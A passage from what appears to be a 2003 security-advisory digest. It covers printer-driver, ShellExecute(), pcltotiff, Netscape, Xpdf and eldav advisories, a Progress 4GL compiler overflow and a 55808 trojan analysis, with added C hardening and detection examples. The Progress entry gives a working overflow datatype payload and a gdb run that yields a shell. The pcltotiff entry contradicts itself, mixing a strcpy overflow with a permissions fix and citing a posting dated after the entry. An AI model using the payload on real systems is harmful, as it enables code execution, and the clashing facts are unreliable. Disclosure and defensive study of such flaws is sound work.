 exploit. A local attacker could easily guess the name of this file
 and create a symbolic link to anywhere on the system. If the target
 exists, it will be overwritten; otherwise, it will be created with
 0666 permissions (world writable).
 
 There is, however, a condition for this to work: the attacker must be
 able to execute ml85p. By default, it is only executable by root or
 members of the "sys" group.


SOLUTION
 It is recommended that all ml85p and escputil users upgrade their
 packages.
 
 The ml85p package does not exist in Conectiva Linux 7: only the
 package corresponding to the escputil tool is being upgraded in that
 version of the distribution.
 
 Due to dependencies in the printer system, several other gimp-print
 packages in Conectiva Linux 8 have to be updated as well, even though
 they are not directly related to these vulnerabilities.

Patches

ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/cups-drivers-1.0-3U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/cups-drivers-1.0-3U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/ml85p-0.1.0-3U80_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/gimp-print-4.2.0-12U80_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/ml85p-0.1.0-3U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/escputil-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-da-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-en_GB-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-fr-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-no-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-pl-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-sv-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-devel-ghostscript-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-doc-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-foomatic-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/libgimpprint1-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/libgimpprint1-devel-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/libgimpprint1-devel-static-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/task-gimp-print-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/task-gimp-print-cups-4.2.0-12U80_1cl.i386.rpm





Windows 2000 ShellExecute() API Lets Applications Cause a Buffer Overflow

2003-07-03

Risk level: high

Type: Buffer overflow

Source of info: Secure Net Services

Impact

A buffer overflow vulnerability exists in the Windows 2000 API function
ShellExecute().


Overview

The Windows API function ShellExecute() runs the application associated
with a specified file (by its extension).

The problem is triggered when the third argument of the Windows 2000
ShellExecute() function (lpFile, the file or object to open) points to an
unusually long string.

Several applications, including a web browser, a mail user agent (MUA)
and a text editor, have been confirmed to be vulnerable: any program
that passes a string of unchecked length from untrusted input to this
argument inherits the problem.


Tested Version:
---------------
  SHELL32.DLL (Version 5.0.3502.6144)


  This problem can be rectified by installing Windows 2000 Service Pack 4.

Patches

http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp



On HP-UX 10.XX pcltotiff has unsafe permissions

2003-06-20

Risk level: medium

Type: unsafe permissions

Source of info: SOFTWARE SECURITY RESPONSE TEAM (SSRT) , Hewlett-Packard Company, HP Services

Impact

A Bugtraq posting dated July 9, 2003 describes a buffer overflow in the
command-line parsing code of the pcltotiff program on HP-UX 10.XX. This
is the subject of HP security bulletin HPSBUX0104-149.

The bug is triggered by invoking pcltotiff with a long string as the
argument of the -t command-line option. During program execution this
argument is copied into a stack buffer with strcpy(), without any size
check. When exploited, the overflow yields a privilege elevation: the
group id of bin can be gained on a vulnerable system, because the binary
is installed set-group-id bin (see the Overview).
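The unchecked copy at the heart of both this pcltotiff bug and the ShellExecute() report above, as an added example (not HP's, Microsoft's or pcltotiff's code): an unbounded strcpy() into a fixed stack buffer beside a bounded replacement and a minimal "-t TITLE" parser built on it. TITLE_MAX, the option handling and the long_arg() helper are assumptions for illustration; the real buffer size is not given in the advisory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TITLE_MAX 64   /* assumed size of the fixed stack buffer */

/* Vulnerable pattern, as the pcltotiff report describes it: the -t argument is
 * copied with strcpy() into a fixed-size stack buffer with no length check.
 * An argument longer than TITLE_MAX overwrites the saved frame pointer and
 * return address; in a setgid binary that is a privilege escalation.
 * Only ever call it with short input; it is here to show the shape of the bug. */
size_t vulnerable_set_title(const char *arg)
{
    char title[TITLE_MAX];
    strcpy(title, arg);            /* BUG: unbounded copy */
    return strlen(title);
}

/* Hardened version: measure first, refuse anything that does not fit together
 * with its terminator, then copy exactly that many bytes.
 * Returns the length stored, or -1 when the argument is rejected. */
int safe_set_title(const char *arg, char *out, size_t outlen)
{
    size_t n = strlen(arg);
    if (outlen == 0 || n >= outlen)
        return -1;
    memcpy(out, arg, n + 1);
    return (int)n;
}

/* Minimal "-t TITLE" option parser built on the bounded copy. Returns 0 with
 * title filled in, 1 if -t is absent, -1 if its value is missing or too long. */
int parse_t_option(int argc, char **argv, char *title, size_t title_len)
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-t") == 0) {
            if (i + 1 >= argc)
                return -1;
            return safe_set_title(argv[i + 1], title, title_len) < 0 ? -1 : 0;
        }
    }
    return 1;
}

/* Builds the kind of argument a tester passes: n bytes of 'A'. Caller frees. */
char *long_arg(size_t n)
{
    char *s = malloc(n + 1);
    if (!s)
        return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(int argc, char **argv)
{
    char title[TITLE_MAX];
    int rc = parse_t_option(argc, argv, title, sizeof title);
    if (rc == 0)
        printf("title: %s\n", title);
    else if (rc < 0)
        fprintf(stderr, "rejected -t argument\n");
    return rc < 0;
}
```

The same check applies to any API argument of the ShellExecute() kind: decide the maximum length up front and reject, rather than truncate, anything longer, so the caller learns that its input was refused.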

Overview

A Bugtraq posting dated July 9, 2003 mentions a vulnerability in
pcltotiff on HP-UX 10.XX. This is the subject of HP security bulletin
HPSBUX0104-149. The main points are:

PROBLEM:   /opt/sharedprint/bin/pcltotiff has unsafe permissions.

PLATFORM:  HP9000 Series 700/800 running HP-UX releases 10.01,
           10.10, 10.20, and 10.26.


   A. Background

      /opt/sharedprint/bin/pcltotiff is in group bin with set group
      id permissions.  This is necessary to allow pcltotiff to read
      files in /usr/lib/X11/fonts/ifo.st/typefaces/.

   B. Fixing the problem

      Remove the set group id permissions from pcltotiff and
      allow read access to /usr/lib/X11/fonts/ifo.st/typefaces/.

   C. Recommended solution

      /sbin/chmod 555 /opt/sharedprint/bin/pcltotiff
      /sbin/chmod o+r /usr/lib/X11/fonts/ifo.st/typefaces/

 SOFTWARE SECURITY RESPONSE TEAM (SSRT)
 Hewlett-Packard Company
 HP Services





Updated Netscape 4.8 packages are now available (for Red Hat Linux)

2003-06-20

Risk level: high

Type: many types

Source of info: Red Hat Security Team

Impact

Updated Netscape 4.8 packages are now available.
Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):
62052 - Does the netscape libflashplugin.so use an insecure zlib ??
65862 - A problem for the zh_CN.GB2312 locale
71341 - Lots of security holes in flash plugin

Overview

Synopsis:          Updated Netscape packages are now available
Advisory ID:       RHSA-2003:026-01
Issue date:        2003-06-20
Updated on:        2003-06-20
Product:           Red Hat Linux
Keywords:          netscape shockwave flash
Cross references:  
Obsoletes:         RHSA-2001:046
CVE Names:         CVE-2002-0846 CAN-2002-1467

1. Topic:

Updated Netscape 4.8 packages fixing various bugs and vulnerabilities are
now available.

2. Relevant releases/architectures:

Red Hat Linux 7.1 - i386
Red Hat Linux 7.2 - i386, ia64
Red Hat Linux 7.3 - i386

3. Problem description:

Netscape is a suite of Internet utilities including a Web browser, email
client, and Usenet news reader.

Netscape version 4.8 contains various bugfixes and updates.

Note that Macromedia Flash is no longer included as of this update. The
recommended Macromedia Flash with security fixes no longer supports
Netscape 4.x.  The security issues that affected the Macromedia Flash
player include CVE-2002-0846 and CAN-2002-1467.

It is recommended that all Netscape Communicator and Netscape Navigator
users upgrade to these errata packages.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which are
not installed but included in the list will not be updated.  Note that you
can also use wildcards (*.rpm) if your current directory *only* contains the
desired RPMs.

Please note that this update is also available via Red Hat Network.  Many
people find this an easier way to apply updates.  To use Red Hat Network,
launch the Red Hat Update Agent with the following command:

up2date

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.

5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):

62052 - Does the netscape libflashplugin.so use an insecure zlib ??
65862 - A problem for the zh_CN.GB2312 locale
71341 - Lots of security holes in flash plugin

Patches

RPMs required:

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/netscape-4.8-1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/netscape-common-4.8-1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/netscape-communicator-4.8-1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/netscape-navigator-4.8-1.i386.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/netscape-4.8-1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/netscape-common-4.8-1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/netscape-communicator-4.8-1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/netscape-navigator-4.8-1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/netscape-common-4.8-1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/netscape-communicator-4.8-1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/netscape-navigator-4.8-1.i386.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/netscape-4.8-1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/netscape-common-4.8-1.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/netscape-communicator-4.8-1.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/netscape-navigator-4.8-1.i386.rpm




Progress 4GL Compiler datatype overflow

2003-06-20

Risk level: medium

Type: Buffer overflow

Source of info: Secure Network Operations, Inc.

Impact

Both the WIN32 and Unix variants of the Progress Application Compiler
suffer from a buffer overflow in the handling of datatype definitions.
The compiler can be reached in a number of ways, for example with the
"-p" option of _progres or prowin32.exe, or from within the Procedure
Editor. Exploiting this issue only grants the privileges of the user
running _progres or prowin32.exe.

Overview

Both the WIN32 and Unix variants of the Progress Application Compiler 
suffer from a buffer overflow in the definition of datatypes. The compiler
can be accessed in a number of ways, for example using the "-p" option with
_progres or prowin32.exe, as well as from within the Procedure Editor. 

An example of a valid datatype would be "char", "integer", "date", etc. 
When the compiler attempts to parse an invalid datatype the user is presented 
with the following message. 

** Invalid datatype -- sample types are: char, integer, date, logical (222)
** overflow.p Could not understand line 1. (196)

Immediately after this message the application prompts the user to press 
the space bar to continue, then it promptly exits. 

If, however, the invalid datatype is longer than 364 characters, the
Progress Compiler segfaults because of unsafe use of memmove(). An
example of such a datatype follows.

def var andrew as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA00001111

In the example above, 0000 is the position that overwrites the saved ebp
and 1111 the position that overwrites the saved eip, i.e. the address
execution returns to.

On *nix platforms the _progres binary is setuid root; however, the
application drops root privileges before executing the .p file, so
exploiting this issue only grants the privileges of the user running
_progres.

On Win32, exploitation can occur from within the Progress Application
Compiler tool, which simply invokes "prowin32.exe -p". Again, the
privileges of the user running prowin32 are obtained.

This issue carries added risk for Win32 users because, when using the
Progress Application Compiler, the user is prompted for a file or
directory name to compile. If a directory name is provided, the compiler
searches it for *.p and attempts to compile every file found. If
compilation is run against a shared drive this becomes a problem,
because an attacker only needs to drop a malicious .p file into the
compile tree. Shortly after clicking the "Start Compile" button you will
notice that the Progress Application Compiler is no longer responding if
someone has planted such a file.
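A check for exactly the shared-compile-tree scenario just described, added here as an example (not Progress's or Secure Network Operations' code): scan .p source text for a datatype token following the `as` keyword that exceeds the 364-character threshold the advisory gives. The tokenizer is deliberately simple (whitespace-delimited `as`, token ends at whitespace or a period, one statement per line) and the threshold constant is taken from the text above; Progress 4GL syntax is richer than this scanner understands, so treat hits as candidates for review.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DATATYPE_LIMIT 364   /* threshold stated in the advisory */

/* Finds a whitespace-delimited "as" keyword (case-insensitive) in a line and
 * returns the length of the token that follows it (up to whitespace, '.' or
 * end of line). Returns 0 when the line has no "as" clause. */
size_t datatype_token_len(const char *line)
{
    const char *p = line;
    while (*p) {
        if ((p == line || isspace((unsigned char)p[-1])) &&
            tolower((unsigned char)p[0]) == 'a' &&
            tolower((unsigned char)p[1]) == 's' &&
            isspace((unsigned char)p[2])) {
            p += 2;
            while (isspace((unsigned char)*p))
                p++;
            size_t n = 0;
            while (p[n] && !isspace((unsigned char)p[n]) && p[n] != '.')
                n++;
            return n;
        }
        p++;
    }
    return 0;
}

/* Scans a whole source buffer line by line. Returns the number of lines whose
 * datatype token exceeds DATATYPE_LIMIT and reports each one to stderr. */
int scan_progress_source(const char *src)
{
    int hits = 0, lineno = 1;
    const char *start = src;
    for (;;) {
        const char *nl = strchr(start, '\n');
        size_t len = nl ? (size_t)(nl - start) : strlen(start);
        char line[8192];
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, start, len);
        line[len] = '\0';
        size_t tok = datatype_token_len(line);
        if (tok > DATATYPE_LIMIT) {
            fprintf(stderr, "line %d: datatype token of %zu chars (limit %d)\n",
                    lineno, tok, DATATYPE_LIMIT);
            hits++;
        }
        if (!nl)
            break;
        start = nl + 1;
        lineno++;
    }
    return hits;
}

int main(int argc, char **argv)
{
    /* Reads one .p file named on the command line and exits non-zero on a hit. */
    if (argc < 2)
        return 2;
    FILE *f = fopen(argv[1], "r");
    if (!f)
        return 2;
    static char buf[1 << 20];
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return scan_progress_source(buf) > 0;
}
```

Run it over every *.p under the compile tree before pressing "Start Compile"; the triggering line in the advisory is one very long line, so the scanner works per line and does not need to understand statements that span several.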

The following output is a sample exploitation scenario. 

[elguapo@rootme dlc]$ cat /usr/dlc/version
PROGRESS Version 9.1D05 as of Sun Feb  2 17:14:07 EST 2003

[elguapo@rootme dlc]$ grep system compiler_exploit.pl
system("echo $buf > overflow.p");
system("gdb /usr/dlc/bin/_progres");

[elguapo@rootme dlc]$ ./compiler_exploit.pl
(gdb) r -p overflow.ped
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000b30 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-2.05b$

As you can see above, executing code is fairly easy. The trick is getting
the user to compile the malicious .p. Note that the line triggering the
overflow could easily be hidden amongst many thousands of lines of code,
making the malicious intent difficult to spot. Obviously, running /bin/sh
would do an attacker no good; it is, however, very easy to supply
shellcode that binds a shell to a port, for example.

As a final note Progress does have the ability to "compile on the fly" so 
it may be possible for users of frontend Progress applications to cause the 
server to execute malicious machine code. 




Intrusec 55808 Trojan Analysis

2003-06-20

Risk level: low

Type: trojan

Source of info: Intrusec

Impact

Intrusec has completed an initial analysis of a trojan that appears to
be one of several responsible for generating substantial scanning
traffic across the Internet with a TCP window size of 55808.

Overview

Introduction:

Intrusec has completed an initial analysis of a trojan that appears to
be one of several responsible for generating substantial scanning
traffic across the Internet with a TCP window size of 55808. The trojan
we have isolated appears to match many of the characteristics that
others in the security community have reported for this trojan.
However, we do not believe that the specific trojan we have identified
is the sole source of the traffic generated, and do not know that it is
a primary source.

The information we've been able to gather leads us to believe that the
trojan we have captured is not the original source of the 55808 traffic
that has been seen, but is rather a "copycat", created to mimic the
behavior of another trojan or worm. The behavior of this copycat appears
to be based on press releases, news articles, and mailing lists that
described its hypothetical behavior and known output. Nonetheless, this
copycat trojan appears to be actively deployed on systems across the
Internet and is something security professionals should be aware of.
Details contained in this analysis will be updated and linked to the
numerous analyses that other security researchers will publish, as they
become available.

Please visit and link to http://www.intrusec.com/55808.html to receive
the latest information available regarding this trojan. There is apt to
be great discussion about the nature of this "trojan" and whether in
fact it is accurately characterized as a trojan, backdoor, zombie, or
worm. While the specific binaries we have captured are probably best
described as a trojan or zombie, there is no assurance that other
variants of this trojan may not be far more malicious in nature and
contain worm or backdoor functionality. We are referring to the trojan
we have captured, and the presumed other existing trojans generating
similar traffic, as "55808 Trojans," and the specific binary we have
analyzed as "55808 Trojan - Variant A." All discussion in our analysis
section refers specifically to the 'A' variant we have captured.
Internet Security Systems, subsequent to the release of this alert,
dubbed this "Stumbler", and refers to this same trojan by that name.


Analysis:

This trojan aims to be a distributed port scanner whose presence is very
difficult to detect. It port scans random addresses across the IP
address space, with a random source address also spoofed. By spoofing
the source address, the trojan is able to avoid easy detection, but it
also means it can not receive the results of the TCP SYN that is sent.
However, since the trojan also sniffs the network it is on in
promiscuous mode, it is likely, over time, to pick up scans from other
installations of trojans that randomly selected a source address that
happened to be on its subnet. As the number of trojans installed across
the Internet grows, more spoofed packets will be sent out by each
trojan, and more of the spoofed source addresses will be captured by
other trojans. 

Each time a reply to a trojan probe is seen, indicating that an open port
has been found, it is written to a file and saved. Daily, the trojan
writes the list of open ports it recorded while sniffing to a file and
delivers that file to a predefined IP address.

In addition, a specially crafted packet can be sent to the subnet the
trojan is listening on which contains in its sequence number the IP
address the trojan should deliver the open port list to daily.  However,
in the current incarnations of this trojan this functionality appears to
be disabled.

Finally, the trojan contains a feature whereby if it fails to connect to
the IP address it is supposed to deliver its open ports list to, it will
automatically attempt to remove itself from the system.

The trojan we have identified has been a file named 'a' that resides in
/tmp/.../a on the filesystem. Its packet collection activity monitors
for any packet with a window size of 55808 and records all packets
matching that window size. The packet capture is written to its current
directory (/tmp/.../ typically) in a file named 'r'. 

There is a default IP address of 12.108.65.76 that the trojan attempts
to make a standard connection (not spoofed) to on TCP port 22 and
deliver the packet capture after it has been running for 24 hours,
however this appears to have been randomly selected as it is not an
active system on the Internet, and it is potentially dynamically
modifiable by a packet that can be sent to the trojan.

The trojan appears to contain some functionality to change the IP
address it delivers its packet captures to, but this functionality is
not operational in the trojan we have obtained.  It appears the stubbed
out code, if activated, would function as follows:  If a packet is
captured that contains a window size of 55808 and a TCP option window
scale of 2, the trojan modifies the IP address packet captures are
delivered to based on the sequence number of that packet.
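The two signatures described above (the 55808 window on every probe, and the stubbed-out retarget trigger of window 55808 plus a window-scale option of 2), turned into detection logic as an added example; this is not Intrusec's code. The packet parser reads a bare IPv4/TCP frame, and the build_probe() helper fabricates constructed test packets rather than using any capture. How the trojan maps the sequence number to an IP address is not stated in the analysis; rendering it as a dotted quad is an assumption made here so the value can be inspected.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STUMBLER_WINDOW 55808
#define TCPOPT_WSCALE 3

struct tcp_summary {
    uint16_t window;
    uint32_t seq;
    int wscale;            /* shift count from the window-scale option, -1 if absent */
    char seq_as_ip[16];    /* sequence number rendered as a dotted quad (assumption) */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Parses an IPv4/TCP packet (no link-layer header). Returns 0 on success,
 * -1 if the packet is not TCP or is truncated anywhere the parser reads. */
int parse_tcp(const uint8_t *pkt, size_t len, struct tcp_summary *out)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 20 || pkt[9] != 6)
        return -1;
    const uint8_t *tcp = pkt + ihl;
    size_t doff = (size_t)(tcp[12] >> 4) * 4;
    if (doff < 20 || len < ihl + doff)
        return -1;
    out->seq = rd32(tcp + 4);
    out->window = rd16(tcp + 14);
    out->wscale = -1;
    const uint8_t *opt = tcp + 20, *end = tcp + doff;
    while (opt < end) {                          /* walk the TCP option list */
        if (*opt == 0) break;                    /* end of options */
        if (*opt == 1) { opt++; continue; }      /* NOP padding */
        if (opt + 1 >= end) return -1;
        uint8_t olen = opt[1];
        if (olen < 2 || opt + olen > end) return -1;
        if (*opt == TCPOPT_WSCALE && olen == 3)
            out->wscale = opt[2];
        opt += olen;
    }
    snprintf(out->seq_as_ip, sizeof out->seq_as_ip, "%u.%u.%u.%u",
             (unsigned)(out->seq >> 24), (unsigned)(out->seq >> 16) & 0xff,
             (unsigned)(out->seq >> 8) & 0xff, (unsigned)out->seq & 0xff);
    return 0;
}

/* 1 if the packet carries the scanner's signature window size. */
int is_stumbler_probe(const struct tcp_summary *s) { return s->window == STUMBLER_WINDOW; }

/* 1 if the packet matches the (currently disabled) retarget trigger. */
int is_retarget_trigger(const struct tcp_summary *s)
{
    return s->window == STUMBLER_WINDOW && s->wscale == 2;
}

/* Builds a constructed IPv4/TCP SYN (test input, not a capture): 40 bytes,
 * or 44 with a NOP-padded window-scale option when wscale >= 0. */
size_t build_probe(uint8_t *buf, uint16_t window, uint32_t seq, int wscale)
{
    size_t total = wscale >= 0 ? 44 : 40;
    memset(buf, 0, total);
    buf[0] = 0x45;                                  /* IPv4, IHL = 5 words */
    buf[2] = (uint8_t)(total >> 8); buf[3] = (uint8_t)total;
    buf[8] = 64;                                    /* TTL */
    buf[9] = 6;                                     /* protocol: TCP */
    uint8_t *tcp = buf + 20;
    tcp[0] = 0x04; tcp[1] = 0xd2;                   /* source port 1234 */
    tcp[2] = 0x00; tcp[3] = 0x50;                   /* destination port 80 */
    tcp[4] = (uint8_t)(seq >> 24); tcp[5] = (uint8_t)(seq >> 16);
    tcp[6] = (uint8_t)(seq >> 8);  tcp[7] = (uint8_t)seq;
    tcp[12] = wscale >= 0 ? 0x60 : 0x50;            /* data offset 6 or 5 words */
    tcp[13] = 0x02;                                 /* SYN */
    tcp[14] = (uint8_t)(window >> 8); tcp[15] = (uint8_t)window;
    if (wscale >= 0) {
        tcp[20] = 1;                                /* NOP */
        tcp[21] = TCPOPT_WSCALE; tcp[22] = 3; tcp[23] = (uint8_t)wscale;
    }
    return total;
}

int main(void)
{
    uint8_t pkt[64];
    struct tcp_summary s;
    size_t n = build_probe(pkt, STUMBLER_WINDOW, 0x0c6c414cu, 2);
    if (parse_tcp(pkt, n, &s) == 0)
        printf("window=%u wscale=%d probe=%d retarget=%d seq-as-ip=%s\n",
               (unsigned)s.window, s.wscale, is_stumbler_probe(&s),
               is_retarget_trigger(&s), s.seq_as_ip);
    return 0;
}
```

Because the probes are sent with spoofed sources, matching on the window size is the only reliable network indicator; a host that emits such packets is the infected one, whatever source address they carry.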

While a novel concept, this trojan seems largely to have been written as
a proof of concept relative to the ideas Lancope described as a '3rd
generation trojan.' Other than generating large amounts of network
traffic, it contains no self-replicating or malicious behavior, and a
few high-speed port scans from compromised host would be a far more
effective and efficient means to map open ports on the Internet than
this type of trojan.

We have only observed the trojan on Linux systems to date. However, the
program itself is quite portable to other unix variants, so it is
possible, if not likely, that it also exists on other unix distributions.
It is also possible that the 'original' trojan is Windows-based.

The trojan appears to be installed on a system either manually, or
through an external exploit that is unrelated to the trojan itself.
There is no exploit code or means to install itself on a host built-in
to the trojan itself.  It is easy to identify that a system on your
network has been infected with this or a related trojan due to its
extremely noisy network activity it generates with TCP packets with a
window size of 55808.

There is apt to be a great deal of discussion of the general techniques
that can be used to locate it; a good starting resource is "Tracking
Down the Phantom Host" by John Payton, available at
http://www.securityfocus.com/infocus/1705.



New eldav packages (for Debian) fix insecure temporary file creation

2003-06-19

Risk level: high

Type: insecure temporary file

Source of info: Debian Security Team

Impact

eldav, a WebDAV client for Emacs, creates temporary files without
taking appropriate security precautions.  This vulnerability could be
exploited by a local user to create or overwrite files with the
privileges of the user running emacs and eldav.

Overview

CVE Ids        : CAN-2003-0438

eldav, a WebDAV client for Emacs, creates temporary files without
taking appropriate security precautions.  This vulnerability could be
exploited by a local user to create or overwrite files with the
privileges of the user running emacs and eldav.

For the stable distribution (woody) this problem has been fixed in
version 0.0.20020411-1woody1.

The old stable distribution (potato) does not contain an eldav
package.

For the unstable distribution (sid) this problem has been fixed in
version 0.7.2-1.

We recommend that you update your eldav package.




Patches

Source archives:

    http://security.debian.org/pool/updates/main/e/eldav/eldav_0.0.20020411-1woody1.dsc
      Size/MD5 checksum:      592 9dd06517b53570a595d5c368924ceda1
    http://security.debian.org/pool/updates/main/e/eldav/eldav_0.0.20020411-1woody1.diff.gz
      Size/MD5 checksum:     3814 c4400b418452e1aea9a115a2af82e1aa
    http://security.debian.org/pool/updates/main/e/eldav/eldav_0.0.20020411.orig.tar.gz
      Size/MD5 checksum:    12319 3b62e4b9b05eb1c8ef27e9f5d3b98db2

  Architecture independent components:

    http://security.debian.org/pool/updates/main/e/eldav/eldav_0.0.20020411-1woody1_all.deb
      Size/MD5 checksum:    15546 5dc5beca6a1c57b5a4b32968ebc07da4



Updated Xpdf packages (for Red Hat) fix security vulnerability

2003-06-18

Risk level: high

Type: arbitrary command execution

Source of info: Red Hat Security Team

Impact

Updated Xpdf packages are available that fix a vulnerability where a
malicious PDF document could run arbitrary code.

Overview

Xpdf is an X Window System based viewer for Portable Document Format
(PDF) files.

Martyn Gilmore discovered a flaw in various PDF viewers and readers.  An
attacker can embed malicious external-type hyperlinks that if activated or
followed by a victim can execute arbitrary shell commands.   The Common
Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0434 to this issue.

All users of Xpdf are advised to upgrade to these errata packages, which
contain a patch to correct this issue.

Patches

Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/xpdf-0.92-4.71.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/xpdf-0.92-4.71.1.i386.rpm

Red Hat Linux 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/xpdf-0.92-9.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/xpdf-0.92-9.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/xpdf-0.92-9.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/xpdf-1.00-6.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-1.00-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-chinese-simplified-1.00-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-chinese-traditional-1.00-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-japanese-1.00-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/xpdf-korean-1.00-6.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/xpdf-1.01-11.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-1.01-11.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-chinese-simplified-1.01-11.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-chinese-traditional-1.01-11.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-japanese-1.01-11.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/xpdf-korean-1.01-11.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/xpdf-2.01-9.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/xpdf-2.01-9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/xpdf-chinese-simplified-2.01-9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/xpdf-chinese-traditional-2.01-9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/xpdf-japanese-2.01-9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/xpdf-korean-2.01-9.i386.rpm



MIPSPro Compiler Predictable Temp File vulnerability

2003-06-17

